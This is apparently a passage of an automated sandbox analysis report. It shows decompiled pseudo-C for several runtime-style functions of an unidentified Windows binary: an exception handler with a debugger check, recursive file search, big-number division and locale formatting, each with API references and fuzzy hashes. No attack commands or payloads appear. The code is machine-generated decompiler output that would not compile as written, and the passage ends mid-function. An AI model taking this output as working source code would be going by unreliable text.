          				intOrPtr _v548;
          				intOrPtr _v552;
          				intOrPtr _v556;
          				intOrPtr _v560;
          				intOrPtr _v564;
          				intOrPtr _v568;
          				intOrPtr _v572;
          				intOrPtr _v576;
          				intOrPtr _v580;
          				intOrPtr _v584;
          				char _v724;
          				intOrPtr _v792;
          				intOrPtr _v800;
          				char _v804;
          				intOrPtr _v808;
          				char _v812;
          				signed int _t40;
          				char* _t47;
          				intOrPtr _t49;
          				intOrPtr _t60;
          				intOrPtr _t61;
          				intOrPtr _t65;
          				intOrPtr _t66;
          				int _t67;
          				intOrPtr _t68;
          				signed int _t69;
          
          				_t68 = __esi;
          				_t66 = __edi;
          				_t65 = __edx;
          				_t60 = __ebx;
          				_t40 =  *0x22d668; // 0x4319796a
          				_t41 = _t40 ^ _t69;
          				_v8 = _t40 ^ _t69;
          				if(_a4 != 0xffffffff) {
          					_push(_a4);
          					E0020E690(_t41);
          					_pop(_t61);
          				}
          				E0020E920(_t66,  &_v804, 0, 0x50);
          				E0020E920(_t66,  &_v724, 0, 0x2cc);
          				_v812 =  &_v804;
          				_t47 =  &_v724;
          				_v808 = _t47;
          				_v548 = _t47;
          				_v552 = _t61;
          				_v556 = _t65;
          				_v560 = _t60;
          				_v564 = _t68;
          				_v568 = _t66;
          				_v524 = ss;
          				_v536 = cs;
          				_v572 = ds;
          				_v576 = es;
          				_v580 = fs;
          				_v584 = gs;
          				asm("pushfd");
          				_pop( *_t22);
          				_v540 = _v0;
          				_t25 =  &_v0; // 0x1b
          				_t49 = _t25;
          				_v528 = _t49;
          				_v724 = 0x10001;
          				_v544 =  *((intOrPtr*)(_t49 - 4));
          				_v804 = _a8;
          				_v800 = _a12;
          				_v792 = _v0;
          				_t67 = IsDebuggerPresent();
          				SetUnhandledExceptionFilter(0);
          				_t36 =  &_v812; // -785
          				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
          					_push(_a4);
          					_t57 = E0020E690(_t57);
          				}
          				return E0020E203(_t57, _v8 ^ _t69);
          			}

          APIs
          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00217CD9
          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00217CE3
          • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00217CF0
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ExceptionFilterUnhandled$DebuggerPresent
          • String ID:
          • API String ID: 3906539128-0
          • Opcode ID: c1ae98629a8acb677dcd4880345107d24f967616ef5a305d815f071620acea43
          • Instruction ID: f8205cdd619a7ce49656ee57fcdd9d25251ac8417adde8c24282982ebe10f040
          • Opcode Fuzzy Hash: c1ae98629a8acb677dcd4880345107d24f967616ef5a305d815f071620acea43
          • Instruction Fuzzy Hash: E431C27491121CABCB21DF68E889B9CBBB8AF18310F5045DAE40CA7291E7309BD58F44
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 74%
          			E00219FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
          				intOrPtr _v8;
          				signed int _v12;
          				intOrPtr* _v32;
          				CHAR* _v36;
          				signed int _v48;
          				char _v286;
          				signed int _v287;
          				struct _WIN32_FIND_DATAA _v332;
          				intOrPtr* _v336;
          				signed int _v340;
          				signed int _v344;
          				intOrPtr _v372;
          				signed int _t35;
          				signed int _t40;
          				signed int _t43;
          				intOrPtr _t45;
          				signed char _t47;
          				intOrPtr* _t55;
          				union _FINDEX_INFO_LEVELS _t57;
          				union _FINDEX_INFO_LEVELS _t58;
          				signed int _t62;
          				signed int _t65;
          				void* _t71;
          				void* _t73;
          				signed int _t74;
          				void* _t77;
          				CHAR* _t78;
          				intOrPtr* _t82;
          				intOrPtr _t84;
          				void* _t86;
          				intOrPtr* _t87;
          				signed int _t91;
          				signed int _t95;
          				void* _t100;
          				intOrPtr _t101;
          				signed int _t104;
          				union _FINDEX_INFO_LEVELS _t105;
          				void* _t110;
          				intOrPtr _t111;
          				void* _t112;
          				signed int _t117;
          				void* _t118;
          				signed int _t119;
          				void* _t120;
          				void* _t121;
          
          				_push(__ecx);
          				_t82 = _a4;
          				_t2 = _t82 + 1; // 0x1
          				_t100 = _t2;
          				do {
          					_t35 =  *_t82;
          					_t82 = _t82 + 1;
          				} while (_t35 != 0);
          				_push(__edi);
          				_t104 = _a12;
          				_t84 = _t82 - _t100 + 1;
          				_v8 = _t84;
          				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
          					_push(__ebx);
          					_push(__esi);
          					_t5 = _t104 + 1; // 0x1
          					_t77 = _t5 + _t84;
          					_t110 = E00217B1B(_t84, _t77, 1);
          					_pop(_t86);
          					__eflags = _t104;
          					if(_t104 == 0) {
          						L6:
          						_push(_v8);
          						_t77 = _t77 - _t104;
          						_t40 = E0021DD71(_t86, _t110 + _t104, _t77, _a4);
          						_t119 = _t118 + 0x10;
          						__eflags = _t40;
          						if(__eflags != 0) {
          							goto L9;
          						} else {
          							_t71 = E0021A212(_a16, _t100, __eflags, _t110);
          							E00217A50(0);
          							_t73 = _t71;
          							goto L8;
          						}
          					} else {
          						_push(_t104);
          						_t74 = E0021DD71(_t86, _t110, _t77, _a8);
          						_t119 = _t118 + 0x10;
          						__eflags = _t74;
          						if(_t74 != 0) {
          							L9:
          							_push(0);
          							_push(0);
          							_push(0);
          							_push(0);
          							_push(0);
          							E00217DBB();
          							asm("int3");
          							_t117 = _t119;
          							_t120 = _t119 - 0x150;
          							_t43 =  *0x22d668; // 0x4319796a
          							_v48 = _t43 ^ _t117;
          							_t87 = _v32;
          							_push(_t77);
          							_t78 = _v36;
          							_push(_t110);
          							_t111 = _v332.cAlternateFileName;
          							_push(_t104);
          							_v372 = _t111;
          							while(1) {
          								__eflags = _t87 - _t78;
          								if(_t87 == _t78) {
          									break;
          								}
          								_t45 =  *_t87;
          								__eflags = _t45 - 0x2f;
          								if(_t45 != 0x2f) {
          									__eflags = _t45 - 0x5c;
          									if(_t45 != 0x5c) {
          										__eflags = _t45 - 0x3a;
          										if(_t45 != 0x3a) {
          											_t87 = E0021DDC0(_t78, _t87);
          											continue;
          										}
          									}
          								}
          								break;
          							}
          							_t101 =  *_t87;
          							__eflags = _t101 - 0x3a;
          							if(_t101 != 0x3a) {
          								L19:
          								_t105 = 0;
          								__eflags = _t101 - 0x2f;
          								if(_t101 == 0x2f) {
          									L23:
          									_t47 = 1;
          									__eflags = 1;
          								} else {
          									__eflags = _t101 - 0x5c;
          									if(_t101 == 0x5c) {
          										goto L23;
          									} else {
          										__eflags = _t101 - 0x3a;
          										if(_t101 == 0x3a) {
          											goto L23;
          										} else {
          											_t47 = 0;
          										}
          									}
          								}
          								_t89 = _t87 - _t78 + 1;
          								asm("sbb eax, eax");
          								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
          								E0020E920(_t105,  &_v332, _t105, 0x140);
          								_t121 = _t120 + 0xc;
          								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
          								_t55 = _v336;
          								__eflags = _t112 - 0xffffffff;
          								if(_t112 != 0xffffffff) {
          									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
          									__eflags = _t91;
          									_t92 = _t91 >> 2;
          									_v344 = _t91 >> 2;
          									do {
          										__eflags = _v332.cFileName - 0x2e;
          										if(_v332.cFileName != 0x2e) {
          											L36:
          											_push(_t55);
          											_t57 = E00219FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
          											_t121 = _t121 + 0x10;
          											__eflags = _t57;
          											if(_t57 != 0) {
          												goto L26;
          											} else {
          												goto L37;
          											}
          										} else {
          											_t92 = _v287;
          											__eflags = _t92;
          											if(_t92 == 0) {
          												goto L37;
          											} else {
          												__eflags = _t92 - 0x2e;
          												if(_t92 != 0x2e) {
          													goto L36;
          												} else {
          													__eflags = _v286;
          													if(_v286 == 0) {
          														goto L37;
          													} else {
          														goto L36;
          													}
          												}
          											}
          										}
          										goto L40;
          										L37:
          										_t62 = FindNextFileA(_t112,  &_v332);
          										__eflags = _t62;
          										_t55 = _v336;
          									} while (_t62 != 0);
          									_t102 =  *_t55;
          									_t95 = _v344;
          									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
          									__eflags = _t95 - _t65;
          									if(_t95 != _t65) {
          										E00215030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00219E2B);
          									}
          								} else {
          									_push(_t55);
          									_t57 = E00219FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
          									L26:
          									_t105 = _t57;
          								}
          								__eflags = _t112 - 0xffffffff;
          								if(_t112 != 0xffffffff) {
          									FindClose(_t112);
          								}
          								_t58 = _t105;
          							} else {
          								__eflags = _t87 -  &(_t78[1]);
          								if(_t87 ==  &(_t78[1])) {
          									goto L19;
          								} else {
          									_push(_t111);
          									_t58 = E00219FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
          								}
          							}
          							__eflags = _v12 ^ _t117;
          							return E0020E203(_t58, _v12 ^ _t117);
          						} else {
          							goto L6;
          						}
          					}
          				} else {
          					_t73 = 0xc;
          					L8:
          					return _t73;
          				}
          				L40:
          			}

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: .
          • API String ID: 0-248832578
          • Opcode ID: 214a1690c82bd310b6275bd4272d1c1d6e19f7c312db46084ace399783f88d7c
          • Instruction ID: 157a9f5d77522fb8c9e2fcd394ae0426e8575bbe5273eee62a693dafc5713d13
          • Opcode Fuzzy Hash: 214a1690c82bd310b6275bd4272d1c1d6e19f7c312db46084ace399783f88d7c
          • Instruction Fuzzy Hash: 6B31E77191024ABFCB248E78CC84EFB7BFDDB95314F1402A8F419D7251E6319D958B50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 90%
          			E0021C0B0(signed int* _a4, signed int* _a8) {
          				signed int _v8;
          				signed int _v12;
          				signed int _v16;
          				signed int _v20;
          				signed int _v24;
          				signed int _v28;
          				signed int _v32;
          				signed int _v36;
          				signed int _v40;
          				signed int _v44;
          				signed int _v52;
          				signed int _v56;
          				signed int _v60;
          				signed int _v64;
          				signed int _v68;
          				signed int _v72;
          				signed int _v76;
          				signed int* _v80;
          				char _v540;
          				signed int _v544;
          				signed int _t197;
          				signed int _t198;
          				signed int* _t200;
          				signed int _t201;
          				signed int _t204;
          				signed int _t206;
          				signed int _t208;
          				signed int _t209;
          				signed int _t213;
          				signed int _t219;
          				intOrPtr _t225;
          				void* _t228;
          				signed int _t230;
          				signed int _t247;
          				signed int _t250;
          				void* _t253;
          				signed int _t256;
          				signed int* _t262;
          				signed int _t263;
          				signed int _t264;
          				void* _t265;
          				intOrPtr* _t266;
          				signed int _t267;
          				signed int _t269;
          				signed int _t270;
          				signed int _t271;
          				signed int _t272;
          				signed int* _t274;
          				signed int* _t278;
          				signed int _t279;
          				signed int _t280;
          				intOrPtr _t282;
          				void* _t286;
          				signed char _t292;
          				signed int _t295;
          				signed int _t303;
          				signed int _t306;
          				signed int _t307;
          				signed int _t309;
          				signed int _t311;
          				signed int _t313;
          				intOrPtr* _t314;
          				signed int _t318;
          				signed int _t322;
          				signed int* _t328;
          				signed int _t330;
          				signed int _t331;
          				signed int _t333;
          				void* _t334;
          				signed int _t336;
          				signed int _t338;
          				signed int _t341;
          				signed int _t342;
          				signed int* _t344;
          				signed int _t349;
          				signed int _t351;
          				void* _t355;
          				signed int _t359;
          				signed int _t360;
          				signed int _t362;
          				signed int* _t368;
          				signed int* _t369;
          				signed int* _t370;
          				signed int* _t373;
          
          				_t262 = _a4;
          				_t197 =  *_t262;
          				if(_t197 != 0) {
          					_t328 = _a8;
          					_t267 =  *_t328;
          					__eflags = _t267;
          					if(_t267 != 0) {
          						_t3 = _t197 - 1; // -1
          						_t349 = _t3;
          						_t4 = _t267 - 1; // -1
          						_t198 = _t4;
          						_v16 = _t349;
          						__eflags = _t198;
          						if(_t198 != 0) {
          							__eflags = _t198 - _t349;
          							if(_t198 > _t349) {
          								L23:
          								__eflags = 0;
          								return 0;
          							} else {
          								_t46 = _t198 + 1; // 0x0
          								_t306 = _t349 - _t198;
          								_v60 = _t46;
          								_t269 = _t349;
          								__eflags = _t349 - _t306;
          								if(_t349 < _t306) {
          									L21:
          									_t306 = _t306 + 1;
          									__eflags = _t306;
          								} else {
          									_t368 =  &(_t262[_t349 + 1]);
          									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
          									__eflags = _t341;
          									while(1) {
          										__eflags =  *_t341 -  *_t368;
          										if( *_t341 !=  *_t368) {
          											break;
          										}
          										_t269 = _t269 - 1;
          										_t341 = _t341 - 4;
          										_t368 = _t368 - 4;
          										__eflags = _t269 - _t306;
          										if(_t269 >= _t306) {
          											continue;
          										} else {
          											goto L21;
          										}
          										goto L22;
          									}
          									_t369 = _a8;
          									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
          									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
          									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
          										goto L21;
          									}
          								}
          								L22:
          								__eflags = _t306;
          								if(__eflags != 0) {
          									_t330 = _v60;
          									_t200 = _a8;
          									_t351 =  *(_t200 + _t330 * 4);
          									_t64 = _t330 * 4; // 0xffffe9e5
          									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
          									_v36 = _t201;
          									asm("bsr eax, esi");
          									_v56 = _t351;
          									if(__eflags == 0) {
          										_t270 = 0x20;
          									} else {
          										_t270 = 0x1f - _t201;
          									}
          									_v40 = _t270;
          									_v64 = 0x20 - _t270;
          									__eflags = _t270;
          									if(_t270 != 0) {
          										_t292 = _v40;
          										_v36 = _v36 << _t292;
          										_v56 = _t351 << _t292 | _v36 >> _v64;
          										__eflags = _t330 - 2;
          										if(_t330 > 2) {
          											_t79 = _t330 * 4; // 0xe850ffff
          											_t81 =  &_v36;
          											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
          											__eflags =  *_t81;
          										}
          									}
          									_v76 = 0;
          									_t307 = _t306 + 0xffffffff;
          									__eflags = _t307;
          									_v32 = _t307;
          									if(_t307 < 0) {
          										_t331 = 0;
          										__eflags = 0;
          									} else {
          										_t85 =  &(_t262[1]); // 0x4
          										_v20 =  &(_t85[_t307]);
          										_t206 = _t307 + _t330;
          										_t90 = _t262 - 4; // -4
          										_v12 = _t206;
          										_t278 = _t90 + _t206 * 4;
          										_v80 = _t278;
          										do {
          											__eflags = _t206 - _v16;
          											if(_t206 > _v16) {
          												_t207 = 0;
          												__eflags = 0;
          											} else {
          												_t207 = _t278[2];
          											}
          											__eflags = _v40;
          											_t311 = _t278[1];
          											_t279 =  *_t278;
          											_v52 = _t207;
          											_v44 = 0;
          											_v8 = _t207;
          											_v24 = _t279;
          											if(_v40 > 0) {
          												_t318 = _v8;
          												_t336 = _t279 >> _v64;
          												_t230 = E0020DDA0(_t311, _v40, _t318);
          												_t279 = _v40;
          												_t207 = _t318;
          												_t311 = _t336 | _t230;
          												_t359 = _v24 << _t279;
          												__eflags = _v12 - 3;
          												_v8 = _t318;
          												_v24 = _t359;
          												if(_v12 >= 3) {
          													_t279 = _v64;
          													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
          													__eflags = _t360;
          													_t207 = _v8;
          													_v24 = _t360;
          												}
          											}
          											_t208 = E00220DE0(_t311, _t207, _v56, 0);
          											_v44 = _t262;
          											_t263 = _t208;
          											_v44 = 0;
          											_t209 = _t311;
          											_v8 = _t263;
          											_v28 = _t209;
          											_t333 = _t279;
          											_v72 = _t263;
          											_v68 = _t209;
          											__eflags = _t209;
          											if(_t209 != 0) {
          												L40:
          												_t264 = _t263 + 1;
          												asm("adc eax, 0xffffffff");
          												_t333 = _t333 + E0020DDC0(_t264, _t209, _v56, 0);
          												asm("adc esi, edx");
          												_t263 = _t264 | 0xffffffff;
          												_t209 = 0;
          												__eflags = 0;
          												_v44 = 0;
          												_v8 = _t263;
          												_v72 = _t263;
          												_v28 = 0;
          												_v68 = 0;
          											} else {
          												__eflags = _t263 - 0xffffffff;
          												if(_t263 > 0xffffffff) {
          													goto L40;
          												}
          											}
          											__eflags = 0;
          											if(0 <= 0) {
          												if(0 < 0) {
          													goto L44;
          												} else {
          													__eflags = _t333 - 0xffffffff;
          													if(_t333 <= 0xffffffff) {
          														while(1) {
          															L44:
          															_v8 = _v24;
          															_t228 = E0020DDC0(_v36, 0, _t263, _t209);
          															__eflags = _t311 - _t333;
          															if(__eflags < 0) {
          																break;
          															}
          															if(__eflags > 0) {
          																L47:
          																_t209 = _v28;
          																_t263 = _t263 + 0xffffffff;
          																_v72 = _t263;
          																asm("adc eax, 0xffffffff");
          																_t333 = _t333 + _v56;
          																__eflags = _t333;
          																_v28 = _t209;
          																asm("adc dword [ebp-0x28], 0x0");
          																_v68 = _t209;
          																if(_t333 == 0) {
          																	__eflags = _t333 - 0xffffffff;
          																	if(_t333 <= 0xffffffff) {
          																		continue;
          																	} else {
          																	}
          																}
          															} else {
          																__eflags = _t228 - _v8;
          																if(_t228 <= _v8) {
          																	break;
          																} else {
          																	goto L47;
          																}
          															}
          															L51:
          															_v8 = _t263;
          															goto L52;
          														}
          														_t209 = _v28;
          														goto L51;
          													}
          												}
          											}
          											L52:
          											__eflags = _t209;
          											if(_t209 != 0) {
          												L54:
          												_t280 = _v60;
          												_t334 = 0;
          												_t355 = 0;
          												__eflags = _t280;
          												if(_t280 != 0) {
          													_t266 = _v20;
          													_t219 =  &(_a8[1]);
          													__eflags = _t219;
          													_v24 = _t219;
          													_v16 = _t280;
          													do {
          														_v44 =  *_t219;
          														_t225 =  *_t266;
          														_t286 = _t334 + _v72 * _v44;
          														asm("adc esi, edx");
          														_t334 = _t355;
          														_t355 = 0;
          														__eflags = _t225 - _t286;
          														if(_t225 < _t286) {
          															_t334 = _t334 + 1;
          															asm("adc esi, esi");
          														}
          														 *_t266 = _t225 - _t286;
          														_t266 = _t266 + 4;
          														_t219 = _v24 + 4;
          														_t164 =  &_v16;
          														 *_t164 = _v16 - 1;
          														__eflags =  *_t164;
          														_v24 = _t219;
          													} while ( *_t164 != 0);
          													_t263 = _v8;
          													_t280 = _v60;
          												}
          												__eflags = 0 - _t355;
          												if(__eflags <= 0) {
          													if(__eflags < 0) {
          														L63:
          														__eflags = _t280;
          														if(_t280 != 0) {
          															_t338 = _t280;
          															_t314 = _v20;
          															_t362 =  &(_a8[1]);
          															__eflags = _t362;
          															_t265 = 0;
          															do {
          																_t282 =  *_t314;
          																_t172 = _t362 + 4; // 0xa6a5959
          																_t362 = _t172;
          																_t314 = _t314 + 4;
          																asm("adc eax, eax");
          																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
          																asm("adc eax, 0x0");
          																_t265 = 0;
          																_t338 = _t338 - 1;
          																__eflags = _t338;
          															} while (_t338 != 0);
          															_t263 = _v8;
          														}
          														_t263 = _t263 + 0xffffffff;
          														asm("adc dword [ebp-0x18], 0xffffffff");
          													} else {
          														__eflags = _v52 - _t334;
          														if(_v52 < _t334) {
          															goto L63;
          														}
          													}
          												}
          												_t213 = _v12 - 1;
          												__eflags = _t213;
          												_v16 = _t213;
          											} else {
          												__eflags = _t263;
          												if(_t263 != 0) {
          													goto L54;
          												}
          											}
          											_t331 = 0 + _t263;
          											asm("adc esi, 0x0");
          											_v20 = _v20 - 4;
          											_t313 = _v32 - 1;
          											_t262 = _a4;
          											_t278 = _v80 - 4;
          											_t206 = _v12 - 1;
          											_v76 = _t331;
          											_v32 = _t313;
          											_v80 = _t278;
          											_v12 = _t206;
          											__eflags = _t313;
          										} while (_t313 >= 0);
          									}
          									_t309 = _v16 + 1;
          									_t204 = _t309;
          									__eflags = _t204 -  *_t262;
          									if(_t204 <  *_t262) {
          										_t191 = _t204 + 1; // 0x21d6cd
          										_t274 =  &(_t262[_t191]);
          										do {
          											 *_t274 = 0;
          											_t194 =  &(_t274[1]); // 0x91850fc2
          											_t274 = _t194;
          											_t204 = _t204 + 1;
          											__eflags = _t204 -  *_t262;
          										} while (_t204 <  *_t262);
          									}
          									 *_t262 = _t309;
          									__eflags = _t309;
          									if(_t309 != 0) {
          										while(1) {
          											_t271 =  *_t262;
          											__eflags = _t262[_t271];
          											if(_t262[_t271] != 0) {
          												goto L78;
          											}
          											_t272 = _t271 + 0xffffffff;
          											__eflags = _t272;
          											 *_t262 = _t272;
          											if(_t272 != 0) {
          												continue;
          											}
          											goto L78;
          										}
          									}
          									L78:
          									return _t331;
          								} else {
          									goto L23;
          								}
          							}
          						} else {
          							_t6 =  &(_t328[1]); // 0xfc23b5a
          							_t295 =  *_t6;
          							_v44 = _t295;
          							__eflags = _t295 - 1;
          							if(_t295 != 1) {
          								__eflags = _t349;
          								if(_t349 != 0) {
          									_t342 = 0;
          									_v12 = 0;
          									_v8 = 0;
          									_v20 = 0;
          									__eflags = _t349 - 0xffffffff;
          									if(_t349 != 0xffffffff) {
          										_t250 = _v16 + 1;
          										__eflags = _t250;
          										_v32 = _t250;
          										_t373 =  &(_t262[_t349 + 1]);
          										do {
          											_t253 = E00220DE0( *_t373, _t342, _t295, 0);
          											_v68 = _t303;
          											_t373 = _t373 - 4;
          											_v20 = _t262;
          											_t342 = _t295;
          											_t303 = 0 + _t253;
          											asm("adc ecx, 0x0");
          											_v12 = _t303;
          											_t34 =  &_v32;
          											 *_t34 = _v32 - 1;
          											__eflags =  *_t34;
          											_v8 = _v12;
          											_t295 = _v44;
          										} while ( *_t34 != 0);
          										_t262 = _a4;
          									}
          									_v544 = 0;
          									_t41 =  &(_t262[1]); // 0x4
          									_t370 = _t41;
          									 *_t262 = 0;
          									E0021AA64(_t370, 0x1cc,  &_v540, 0);
          									_t247 = _v20;
          									__eflags = 0 - _t247;
          									 *_t370 = _t342;
          									_t262[2] = _t247;
          									asm("sbb ecx, ecx");
          									__eflags =  ~0x00000000;
          									 *_t262 = 0xbadbae;
          									return _v12;
          								} else {
          									_t14 =  &(_t262[1]); // 0x4
          									_t344 = _t14;
          									_v544 = 0;
          									 *_t262 = 0;
          									E0021AA64(_t344, 0x1cc,  &_v540, 0);
          									_t256 = _t262[1];
          									_t322 = _t256 % _v44;
          									__eflags = 0 - _t322;
          									 *_t344 = _t322;
          									asm("sbb ecx, ecx");
          									__eflags = 0;
          									 *_t262 =  ~0x00000000;
          									return _t256 / _v44;
          								}
          							} else {
          								_t9 =  &(_t262[1]); // 0x4
          								_v544 = _t198;
          								 *_t262 = _t198;
          								E0021AA64(_t9, 0x1cc,  &_v540, _t198);
          								__eflags = 0;
          								return _t262[1];
          							}
          						}
          					} else {
          						__eflags = 0;
          						return 0;
          					}
          				} else {
          					return _t197;
          				}
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
          • Instruction ID: 70962bd49a16e39642a822b7e8f7a694e81cb6942fa7834d4b39c799ec6b5d09
          • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
          • Instruction Fuzzy Hash: FB025C75E5021A9BDF14CFA9C8806EDB7F1FF98324F25816AD819E7380D731AA51CB90
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00209D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
          				short _v104;
          				short _v304;
          				short* _t23;
          				int _t24;
          
          				if( *0x22d610 == 0) {
          					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
          					 *0x24de30 = _v304;
          					 *0x24de32 = 0;
          					 *0x22d610 = 0x24de30;
          				}
          				E001FF980(_a4, _a8,  &_v104, 0x32);
          				_t23 = _a12;
          				_t24 = _a16;
          				 *_t23 = 0;
          				GetNumberFormatW(0x400, 0,  &_v104, 0x22d600, _t23, _t24);
          				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
          				return 0;
          			}

          APIs
          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00209DBF
          • GetNumberFormatW.KERNEL32 ref: 00209E0E
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: FormatInfoLocaleNumber
          • String ID:
          • API String ID: 2169056816-0
          • Opcode ID: 6dd8276a4f2bf9f801de478e058c385778fe187f5409fed41945c1cecdd18e76
          • Instruction ID: 3c772e596bc2539a5bcc86e8946edc47d77190fbcb4cc5748c24f75f1193ed97
          • Opcode Fuzzy Hash: 6dd8276a4f2bf9f801de478e058c385778fe187f5409fed41945c1cecdd18e76
          • Instruction Fuzzy Hash: E2015E35610208BBD7209FA4EC49FAB77BCEF19710F505422FA08A72A1D3B1992587A5
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 79%
          			E001F6D06(WCHAR* _a4, long _a8) {
          				long _t3;
          				signed int _t5;
          
          				_t3 = GetLastError();
          				if(_t3 == 0) {
          					return 0;
          				}
          				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
          				asm("sbb eax, eax");
          				return  ~( ~_t5);
          			}






          APIs
          • GetLastError.KERNEL32(00200DE0,?,00000200), ref: 001F6D06
          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 001F6D27
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorFormatLastMessage
          • String ID:
          • API String ID: 3479602957-0
          • Opcode ID: ec5c41134b932727300844a261f42f859c1f7c8502ffa87c553b366e7ebb9834
          • Instruction ID: 1684da6be331632bea7aef8f92236d9a1a51fbfdf81e118dbda792c18e0fa64f
          • Opcode Fuzzy Hash: ec5c41134b932727300844a261f42f859c1f7c8502ffa87c553b366e7ebb9834
          • Instruction Fuzzy Hash: 57D0C97138830ABEFA210AB09C0AF3A7795B765B82F209904B396E90E0D6719119D629
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00220654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
          				signed int _t172;
          				signed int _t175;
          				signed int _t178;
          				signed int* _t179;
          				signed int _t195;
          				signed int _t199;
          				signed int _t202;
          				void* _t203;
          				void* _t206;
          				signed int _t209;
          				void* _t210;
          				signed int _t225;
          				unsigned int* _t240;
          				signed char _t242;
          				signed int* _t250;
          				unsigned int* _t256;
          				signed int* _t257;
          				signed char _t259;
          				long _t262;
          				signed int* _t265;
          
          				 *(_a4 + 4) = 0;
          				_t262 = 0xc000000d;
